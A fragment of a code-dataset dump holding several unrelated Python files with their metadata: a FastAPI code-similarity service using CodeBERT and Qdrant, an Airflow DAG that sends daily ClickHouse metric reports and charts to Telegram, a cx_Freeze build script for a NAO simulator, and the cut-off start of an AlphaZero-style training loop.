OK_MESSAGE, NO_FILE_RETREIVED_MESSAGE\nfrom pydantic_settings import BaseSettings\nfrom qdrant_client import QdrantClient\nfrom src.pydantic_models import ListCodeComparisonResponseModel\nfrom src.utils import get_number_of_lines\n\n\nclass Settings(BaseSettings):\n QDRANT_CLUSTER_HOST: str = \"localhost\"\n QDRANT_CLUSTER_PORT: int = 6333\n\n\nsettings = Settings()\nqdrant_client = QdrantClient(\n settings.QDRANT_CLUSTER_HOST, port=settings.QDRANT_CLUSTER_PORT, timeout=200\n)\n\napp = FastAPI()\npipe = pipeline(\"feature-extraction\", model=\"microsoft/codebert-base\")\n\n\n@app.get(\"/\")\nasync def main():\n \"\"\"Redirect to /docs (relative URL)\"\"\"\n return RedirectResponse(url=\"/docs\", status_code=status.HTTP_302_FOUND)\n\n\n@app.post(\"/v1/compareCodeFile\", status_code=status.HTTP_202_ACCEPTED)\nasync def compare_code_file(\n file: Annotated[UploadFile, File()],\n limit: Annotated[str, Form()],\n response: Response,\n) -> ListCodeComparisonResponseModel:\n if not file:\n response.status_code = status.HTTP_422_UNPROCESSABLE_ENTITY\n return {\"message\": NO_FILE_RETREIVED_MESSAGE}\n\n content = str(await file.read())\n\n embbedding = pipe(content, padding=True, truncation=True)[0][0]\n\n result = qdrant_client.search(\"code\", embbedding, limit=limit)\n\n return {\"message\": result}\n\n\n@app.get(\"/healthz\", status_code=status.HTTP_200_OK)\nasync def healthz():\n return {\"message\": OK_MESSAGE}\n\n\n@app.on_event(\"shutdown\")\ndef on_shutdown():\n qdrant_client.close()\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n", "repo_name": "lince098/MBD2223_Thesis", "sub_path": "BackEnd/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pydantic_settings.BaseSettings", "line_number": 13, "usage_type": "name"}, {"api_name": "qdrant_client.QdrantClient", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 23, "usage_type": "call"}, {"api_name": "transformers.pipeline", "line_number": 24, "usage_type": "call"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_302_FOUND", "line_number": 30, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 35, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 35, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 36, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 36, "usage_type": "call"}, {"api_name": "fastapi.Response", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_422_UNPROCESSABLE_ENTITY", "line_number": 40, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 40, "usage_type": "name"}, {"api_name": "src.constants.NO_FILE_RETREIVED_MESSAGE", "line_number": 41, "usage_type": "name"}, {"api_name": "qdrant_client.search", "line_number": 47, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_202_ACCEPTED", "line_number": 33, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 33, "usage_type": "name"}, {"api_name": "src.pydantic_models.ListCodeComparisonResponseModel", "line_number": 38, "usage_type": "name"}, {"api_name": "src.constants.OK_MESSAGE", "line_number": 54, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 52, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 52, "usage_type": "name"}, {"api_name": "qdrant_client.close", "line_number": 59, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "33819286626", "text": "from datetime import datetime, timedelta\nimport pandas as pd\nfrom airflow.decorators import dag, task\nfrom airflow.operators.python import get_current_context\nimport pandahouse as ph\nimport telegram\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport io\n\n# устанавливаем connection\nconnection = {'host': 'https://clickhouse.lab.karpov.courses',\n 'database':'simulator_20221120',\n 'user':'USER', \n 'password':'PASSWORD'\n }\n\n# выбираем необходимую тему для графиков\nfrom matplotlib import style\nsns.set_theme(({**style.library[\"fivethirtyeight\"]}))\nplt.rcParams[\"figure.figsize\"] = (15,8)\n\n\n# вставить токен для бота\nmy_token = 'my_token' \nbot = telegram.Bot(token=my_token) \n\n# вставить чат id\nchat_id = 'chat_id'\n\ndefault_args = {\n 'owner': 'd-merinov-24',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 12, 16)\n }\n\nschedule_interval = '0 11 * * *'\n\n@dag(default_args=default_args, schedule_interval=schedule_interval, catchup=False)\ndef lesson_7_dag_2_merinov():\n\n @task()\n def get_dau_df_2():\n\n \"\"\"\n функция вовзвращает датафрейм с данными по DAU\n \"\"\"\n\n query = '''\n SELECT COUNT (DISTINCT user_id ) as uniq_users,\n day, os, gender, age, source \n FROM (\n\n SELECT user_id,\n toStartOfDay(toDateTime(time)) AS day, os, gender, age, source \n FROM simulator_20221120.feed_actions \n GROUP BY user_id, day,os, gender, age, source \n HAVING day > (today()-1) - 7 and day != today()\n\n UNION ALL\n\n SELECT user_id,\n toStartOfDay(toDateTime(time)) AS day, os, gender, age, source \n FROM simulator_20221120.message_actions \n GROUP BY user_id, day, os, gender, age, source \n HAVING day > (today()-1) - 7 and day != today()\n )\n GROUP BY day, os, gender, age, source \n '''\n dau_df = ph.read_clickhouse(query=query, connection=connection)\n dau_df.day = dau_df.day.dt.date\n return dau_df\n\n @task()\n def get_dau_info(dau_df):\n\n \"\"\"\n функция вовзвращает текстовый отчет по пользовательским метрикам в приложении\n dau_df: pandas.DataFrame\n датафрейм с данными по пользователя\n \"\"\"\n\n dau = dau_df.groupby('day', as_index=False).agg({'uniq_users':'sum'})\n dau['growth_rate'] = dau.uniq_users.pct_change()\n\n date = dau.day.max()\n dau_value = dau.query('day == @dau_df.day.max()').iloc[0][1]\n diff = round((dau.query('day == @dau_df.day.max()').iloc[0][2]*100), 2)\n\n if diff > 0:\n change = 'больше'\n else:\n change = 'меньше'\n\n title = '👥Пользователи'\n\n text_1 = f'За {date} DAU составил {dau_value}, что на {abs(diff)}% {change}, чем днем ранее.'\n\n source = dau_df.groupby(['day', 'source'], as_index=False)\\\n .agg({'uniq_users':'sum'})\\\n .sort_values('day')\n source['ads_growth_rate'] = source.query('source == \"ads\"').uniq_users.pct_change()\n source['organic_growth_rate'] = source.query('source == \"organic\"').uniq_users.pct_change()\n\n ads_users = source.query('day == @dau_df.day.max() and source == \"ads\"').iloc[0][2]\n organic_users = source.query('day == @dau_df.day.max() and source == \"organic\"').iloc[0][2]\n\n ads_growth = round(source.query('day == @dau_df.day.max() and source == \"ads\"').iloc[0][3] * 100, 2)\n organic_growth = round(source.query('day == @dau_df.day.max() and source == \"organic\"').iloc[0][4] * 100, 2)\n\n text_2 = f'Их них {ads_users} ({ads_growth}% к пред. дню) пользователей с рекламы и {organic_users} ({organic_growth}% к пред. дню) с органического трафика. '\n\n os = dau_df.groupby(['day', 'os'], as_index=False)\\\n .agg({'uniq_users':'sum'})\\\n .sort_values('day')\n os['androind_growth_rate'] = os.query('os == \"Android\"').uniq_users.pct_change()\n os['iOS_growth_rate'] = os.query('os == \"iOS\"').uniq_users.pct_change()\n\n android_users = os.query('day == @dau_df.day.max() and os == \"Android\"').iloc[0][2]\n ios_users = os.query('day == @dau_df.day.max() and os == \"iOS\"').iloc[0][2]\n\n android_growth = round(os.query('day == @dau_df.day.max() and os == \"Android\"').iloc[0][3] * 100, 2)\n ios_growth = round(os.query('day == @dau_df.day.max() and os == \"iOS\"').iloc[0][4] * 100, 2)\n\n text_3 = f'Лентой воспользовались {android_users} ({android_growth}% к пред. дню) пользователей с Android и {ios_users} пользователей с iOS({ios_growth}% к пред. дню). '\n\n return title + '\\n' + '\\n' + text_1 + '\\n' + text_2 + '\\n' + text_3 + '\\n'\n\n @task()\n def get_df_new_users():\n\n \"\"\"\n функция вовзвращает датафрейм с данными по новым пользователям\n \"\"\"\n\n query = '''with mess as (Select user_id,\n min(toDate(time)) as bd,\n os, gender, age, source\n From simulator_20221120.message_actions \n Group by user_id, os, gender, age, source\n having bd > (today()-1) - 7 and bd != today()),\n feed as \n (Select user_id,\n min(toDate(time)) as bd,\n os, gender, age, source\n From simulator_20221120.feed_actions \n Group by user_id, os, gender, age, source\n having bd > (today()-1) - 7 and bd != today())\n\n select count(distinct user_id) as users, bd, os,gender, age, source from feed l\n full Join mess r on l.user_id = r.user_id \n AND l.bd=r.bd \n AND l.os=r.os \n AND l.gender=r.gender \n AND l.age=r.age \n AND l.source = r.source\n group by bd, os,gender, age, source\n ORDER BY bd DESC'''\n df_new_users = ph.read_clickhouse(query=query, connection=connection)\n df_new_users.bd = df_new_users.bd.dt.date\n return df_new_users\n \n @task()\n def get_info_new_users(df_new_users):\n\n \"\"\"\n функция вовзвращает тексто��ый отчет по метрикам в приложении о новых пользователях\n df_new_users: pandas.DataFrame\n датафрейм с данными по новым пользователям\n \"\"\"\n\n new_users = df_new_users.groupby('bd', as_index=False).agg({'users':'sum'})\n new_users['growth_rate'] = new_users.users.pct_change()\n\n date = new_users.bd.max()\n new_users_value = new_users.query('bd == @df_new_users.bd.max()').iloc[0][1]\n diff = round((new_users.query('bd == @df_new_users.bd.max()').iloc[0][2]*100), 2)\n\n if diff > 0:\n change = 'больше'\n else:\n change = 'меньше'\n\n title = \"🆕Новые пользователи\"\n\n text_1 = f'За день пришло {new_users_value} новых пользователей, что на {abs(diff)}% {change}, чем днем ранее.'\n\n source = df_new_users.groupby(['bd', 'source'], as_index=False)\\\n .agg({'users':'sum'})\\\n .sort_values('bd')\n\n source['ads_growth_rate'] = source.query('source == \"ads\"').users.pct_change()\n source['organic_growth_rate'] = source.query('source == \"organic\"').users.pct_change()\n\n ads_users = source.query('bd == @df_new_users.bd.max() and source == \"ads\"').iloc[0][2]\n organic_users = source.query('bd == @df_new_users.bd.max() and source == \"organic\"').iloc[0][2]\n\n ads_growth = round(source.query('bd == @df_new_users.bd.max() and source == \"ads\"').iloc[0][3] * 100, 2)\n organic_growth = round(source.query('bd == @df_new_users.bd.max() and source == \"organic\"').iloc[0][4] * 100, 2)\n\n text_2 = f'Их них {ads_users} ({ads_growth}% к пред. дню) пользователей с рекламы и {organic_users} ({organic_growth}% к пред. дню) с органического трафика. '\n\n df_new_users['age_cut'] = pd.cut(df_new_users.age, [0, 15, 21, 27, 35, 45, 60, 70, 150])\n\n male = df_new_users.groupby(['gender', 'bd'])['users'].sum()\\\n .to_frame().reset_index()\\\n .query('bd == @df_new_users.bd.max() and gender == 1')\\\n .iloc[0][2]\n female = df_new_users.groupby(['gender', 'bd'])['users'].sum()\\\n .to_frame().reset_index()\\\n .query('bd == @df_new_users.bd.max() and gender == 0')\\\n .iloc[0][2]\n\n age = df_new_users.groupby(['age_cut', 'bd'])['users'].sum()\\\n .to_frame().reset_index()\\\n .sort_values(['bd', 'users'], ascending=False)\\\n .iloc[0][0]\n male_share = round(male/(female+male)*100)\n female_share = round(female/(female+male)*100)\n\n text_3 = f'Среди новых пользователей мужчин - {male} ({male_share}%) человек, девушек - {female} ({female_share}%) человек. Наибольшее число новых пользователей в возрасте {age}'\n\n\n return title+ '\\n' + '\\n' + text_1 + '\\n' + text_2 + '\\n' + text_3\n \n @task()\n def get_likes_views_df():\n \n \"\"\"\n функция вовзвращает датафрейм с данными по лайкам и просмотрам\n \"\"\"\n query = '''SELECT toStartOfDay(toDateTime(time)) AS day,\n count(user_id) as actions,\n action \n FROM simulator_20221120.feed_actions\n WHERE day > (today()-1) - 7 and day != today()\n GROUP BY toStartOfDay(toDateTime(time)), action\n ORDER BY day DESC '''\n\n likes_views_df = ph.read_clickhouse(query=query, connection=connection)\n likes_views_df.day = likes_views_df.day.dt.date\n return likes_views_df\n\n @task()\n def get_messages_df():\n \n \"\"\"\n функция вовзвращает датафрейм с данными по сообщениям\n \"\"\"\n\n query = '''SELECT toStartOfDay(toDateTime(time)) AS day,\n count(user_id) as messages\n FROM simulator_20221120.message_actions\n WHERE day > (today()-1) - 7 and day != today()\n GROUP BY toStartOfDay(toDateTime(time))\n ORDER BY day DESC'''\n messages_df = ph.read_clickhouse(query=query, connection=connection)\n # messages_df.day = likes_views_df.day.dt.date\n\n return messages_df\n @task()\n def get_info_likes_views_mess(likes_views_df, messages_df):\n\n \"\"\"\n функция вовзвращает текстовый отчет по метрикам в приложении о лай��ах, просмотрах и сообщениях\n likes_views_df: pandas.DataFrame\n датафрейм с данными по лайкам и просмотрам\n messages_df: pandas.DataFrame\n датафрейм с данными по сообщениям\n \"\"\"\n\n actions_df = likes_views_df.groupby(['day', 'action'], as_index=False)\\\n .agg({'actions':'sum'})\\\n .sort_values('day')\n actions_df['like_growth_rate'] = actions_df.query('action == \"like\"').actions.pct_change()\n actions_df['view_growth_rate'] = actions_df.query('action == \"view\"').actions.pct_change()\n\n likes = actions_df.query('day == @actions_df.day.max() and action == \"like\"').iloc[0][2]\n views = actions_df.query('day == @actions_df.day.max() and action == \"view\"').iloc[0][2]\n\n likes_growth = round(actions_df.query('day == @actions_df.day.max() and action == \"like\"').iloc[0][3] * 100, 2)\n views_growth = round(actions_df.query('day == @actions_df.day.max() and action == \"view\"').iloc[0][4] * 100, 2)\n\n ctr = round(likes/views, 4)*100\n\n title = \"💖💬Активность\"\n\n text_1 = f'За вчера было поставлено {likes} лайков ({likes_growth}% к пред. дню) и просмотрено {views} постов ({views_growth}% к пред. дню). CTR составил {ctr}%'\n\n mes_1 = messages_df.sort_values('day', ascending=False).iloc[0][1]\n mes_0 = messages_df.sort_values('day', ascending=False).iloc[1][1]\n\n mes_diff = round(mes_1/mes_0 - 1, 2)*100\n\n text_2 = f'Также было отправлено {mes_1} сообщений ({mes_diff}% к пред. дню)'\n\n return title + '\\n'+ '\\n' + text_1 + '\\n' + text_2\n \n @task()\n def send_plot_dau_df(dau_df):\n\n \"\"\"\n функция отпраляет графики на основании данных о DAU\n dau_df: pandas.DataFrame\n датафрейм с данными по пользователям\n \"\"\"\n\n dau_df.day = pd.to_datetime(dau_df[\"day\"])\n dau_df = dau_df.sort_values('day')\n dau_df.day = dau_df.day.dt.strftime('%d-%m')\n\n plt.subplot(212)\n plt.title('Динамика DAU')\n sns.lineplot(y = 'uniq_users', x='day', data=dau_df)\n plt.subplot(221)\n plt.title('Динамика DAU в разбивке по OS')\n sns.lineplot(y = dau_df.uniq_users, x=dau_df.day, hue=dau_df.os)\n plt.subplot(222)\n plt.title('Динамика DAU в разбивке по Source')\n sns.lineplot(y = dau_df.uniq_users, x=dau_df.day, hue=dau_df.source)\n\n plot_object = io.BytesIO()\n plt.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = 'dau.png'\n plt.close()\n bot.sendPhoto(chat_id=chat_id, photo=plot_object, parse_mode='HTML')\n \n @task()\n def send_plot_new_users_df(df_new_users):\n\n \"\"\"\n функция отпраляет графики на основании данных о новых пользователях\n df_new_users: pandas.DataFrame\n датафрейм с данными по новым пользователям\n \"\"\"\n \n df_new_users.bd = pd.to_datetime(df_new_users.bd)\n df_new_users = df_new_users.sort_values('bd').query('bd > \"1971-01-01\"')\n df_new_users.bd = df_new_users.bd.dt.strftime('%d-%m')\n\n\n plt.subplot(212)\n plt.title('динамика привлечения новых пользователей')\n sns.lineplot(y = 'users', x='bd', data=df_new_users)\n plt.subplot(221)\n plt.title('Новые пользователи в разрезе OS')\n sns.lineplot(y = 'users', x='bd', hue='os', data=df_new_users)\n plt.subplot(222)\n plt.title('Новые пользователи в разрезе Source')\n sns.lineplot(y = 'users', x='bd', hue='source', data=df_new_users)\n\n plot_object = io.BytesIO()\n plt.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = 'dau.png'\n plt.close()\n bot.sendPhoto(chat_id=chat_id, photo=plot_object, parse_mode='HTML')\n \n @task()\n def send_plot_likes_views_df(likes_views_df, messages_df):\n\n \"\"\"\n функция отпраляет графики на основании данных о сообщениях, лайках и просмотров\n likes_views_df: pandas.DataFrame\n датафрейм с данными по лайкам и просмотрам\n messages_df: pandas.DataFrame\n датафрейм с данными по сообщениям\n \"\"\"\n\n likes_views_df.day = pd.to_datetime(likes_views_df[\"day\"])\n likes_views_df = likes_views_df.sort_values('day')\n likes_views_df.day = likes_views_df.day.dt.strftime('%d-%m')\n\n messages_df.day = pd.to_datetime(messages_df[\"day\"])\n messages_df = messages_df.sort_values('day')\n messages_df.day = messages_df.day.dt.strftime('%d-%m')\n\n ctr = likes_views_df.pivot_table(index='day', columns='action', values='actions').reset_index()\n ctr['ctr'] = ctr.like / ctr.view\n ctr['ctr'] = ctr.ctr.mul(100).round(2)\n\n plt.subplot(212)\n plt.title('Динамика CTR, %')\n sns.lineplot(y = 'ctr', x='day', data=ctr)\n plt.subplot(221)\n plt.title('Активность в ленте')\n sns.lineplot(y = 'actions', x='day', hue='action', data=likes_views_df)\n plt.subplot(222)\n plt.title('Кол-во отправленных сообщений')\n sns.lineplot(y = 'messages', x='day', data=messages_df)\n\n plot_object = io.BytesIO()\n plt.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = 'dau.png'\n plt.close()\n bot.sendPhoto(chat_id=chat_id, photo=plot_object, parse_mode='HTML')\n \n @task()\n def send_message(title):\n\n \"\"\"\n функция отправлет сообщение \n title: str\n текст сообщения\n \"\"\"\n bot.sendMessage(chat_id=chat_id, text=title, parse_mode='HTML')\n \n @task()\n def send_message_title():\n\n \"\"\"\n функция отправлет заголовок отчета \n \"\"\"\n \n context = get_current_context()\n ds = context['ds']\n bot.sendMessage(chat_id=chat_id, text=f\"📄Ежедневный отчет по ленте новостей, и по сервису отправки сообщений. Дата: {ds}\", parse_mode='HTML')\n \n # определяем последовательность тасков\n send_message_title()\n dau_df = get_dau_df_2()\n title_1 = get_dau_info(dau_df)\n send_message(title_1)\n send_plot_dau_df(dau_df)\n df_new_users = get_df_new_users()\n title_2 = get_info_new_users(df_new_users)\n send_message(title_2)\n send_plot_new_users_df(df_new_users)\n likes_views_df = get_likes_views_df()\n messages_df = get_messages_df()\n title_3 = get_info_likes_views_mess(likes_views_df, messages_df)\n send_message(title_3)\n send_plot_likes_views_df(likes_views_df, messages_df)\n \n # запускаем dag \nlesson_7_dag_2_merinov = lesson_7_dag_2_merinov()", "repo_name": "GLaDOS070/educational_projects", "sub_path": "airflow_dag/Lesson_7_dag_2.py", "file_name": "Lesson_7_dag_2.py", "file_ext": "py", "file_size_in_byte": 19774, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seaborn.set_theme", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.style.library", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.style", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 72, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 44, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 76, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 161, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 205, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 165, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 242, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 228, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 259, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 246, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 263, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 314, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 314, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 315, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 320, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 322, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "airflow.decorators.task", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 352, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 352, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 353, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 356, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 356, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "airflow.decorators.task", "line_number": 331, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 373, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 386, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 386, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 389, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 392, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 392, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 393, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 396, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 399, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 399, "usage_type": "name"}, {"api_name": "airflow.decorators.task", "line_number": 362, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 402, "usage_type": "call"}, {"api_name": "airflow.operators.python.get_current_context", "line_number": 419, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 412, "usage_type": "call"}, {"api_name": "airflow.decorators.dag", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "35974259075", "text": "import sys\n\nfrom cx_Freeze import setup, Executable\nimport PyQt4\nimport os\nimport PyQt4.uic\n\n\"\"\"\nutiliser : python setup.py build pour compiler.\n\"\"\"\n\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nimportationCode=[]\n\ndependances = [\"doc/\",\"dep/\",\"objects/\"]\n\nicone = [r\"dep/48.ico\"]\n\n#QWEB\nincludefiles = [\"rsc_rc.py\",(os.path.join(os.path.dirname(PyQt4.uic.__file__),\n\"widget-plugins\"), \"PyQt4.uic.widget-plugins\")]+importationCode+dependances\n#QWEB!\n\nincludes = [\"PyQt4.QtNetwork\", \"atexit\", \"numpy.core._methods\", \"numpy.lib.format\"]\nexcludes = []\npackages = [\"encodings\",\n \"OpenGL\",\n \"OpenGL.arrays\" # or just this one\n ]\n\nsetup(\n name = \"NAO_Simulator_2014\",\n author = \"Adrien Vernotte\",\n version = \"1.0.0\",\n description = \"Simulateur gratuit de NAO - Adrien Vernotte - LGPL v2.1\",\n executables = [Executable(\"NaoSimulator.py\", \n base = base,\n icon = icone[0]\n )\n ],\n options = {'build_exe': {'excludes':excludes,\n 'packages':packages,'include_files':includefiles,\n \"includes\":includes}}\n )\n", "repo_name": "AdrienVR/NaoSimulator", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.platform", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt4.uic", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cx_Freeze.setup", "line_number": 34, "usage_type": "call"}, {"api_name": "cx_Freeze.Executable", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "10692164870", "text": "import time\nfrom collections import deque\nimport random\n\nimport numpy as np\nimport torch\n\nfrom net import *\nfrom game import Game\nfrom data_loader import DataLoader\n\n\nclass Train(object):\n def __init__(self, use_cuda=USECUDA, lr=LR):\n\n if use_cuda:\n torch.cuda.manual_seed(1234)\n else:\n torch.manual_seed(1234)\n\n self.kl_targ = 0.02\n self.lr_multiplier = 1.\n self.use_cuda = use_cuda\n\n self.net = Net()\n self.eval_net = Net()\n if use_cuda:\n self.net = self.net.cuda()\n self.eval_net = self.eval_net.cuda()\n\n self.dl = DataLoader(use_cuda, MINIBATCH)\n self.sample_data = deque(maxlen=TRAINLEN)\n self.gen_optim(lr)\n self.entropy = AlphaEntropy()\n\n def sample(self, datas):\n for state, pi, reward in datas:\n c_state = state.copy()\n c_pi = pi.copy()\n for i in range(4):\n c_state = np.array([np.rot90(s, i) for s in c_state])\n c_pi = np.rot90(c_pi.reshape(SIZE, SIZE), i)\n self.sample_data.append([c_state, c_pi.flatten(), reward])\n\n c_state = np.array([np.fliplr(s) for s in c_state])\n c_pi = np.fliplr(c_pi)\n self.sample_data.append([c_state, c_pi.flatten(), reward])\n\n return len(datas)\n\n def gen_optim(self, lr):\n optim = torch.optim.Adam(self.net.parameters(), lr=lr, weight_decay=L2)\n self.optim = ScheduledOptim(optim, lr)\n\n def run(self):\n model_path = f\"model_{time.strftime('%Y%m%d%H%M', time.localtime())}.pt\"\n self.net.save_model(path=model_path)\n self.eval_net.load_model(path=model_path, cuda=self.use_cuda)\n\n for step in range(1, 1 + GAMETIMES):\n game = Game(self.net, self.eval_net)\n print(f\"Game - {step} | data length - {self.sample(game.play())}\")\n if len(self.sample_data) < MINIBATCH:\n continue\n\n states, pi, rewards = self.dl(self.sample_data)\n _, old_props = self.net(states)\n\n for _ in range(EPOCHS):\n self.optim.zero_grad()\n\n v, props = self.net(states)\n loss = self.entropy(props, v, pi, rewards)\n loss.backward()\n\n self.optim.step()\n\n _, new_props = self.net(states)\n kl = torch.mean(torch.sum(\n torch.exp(old_props) * (old_props - new_props), 1)).item()\n if kl 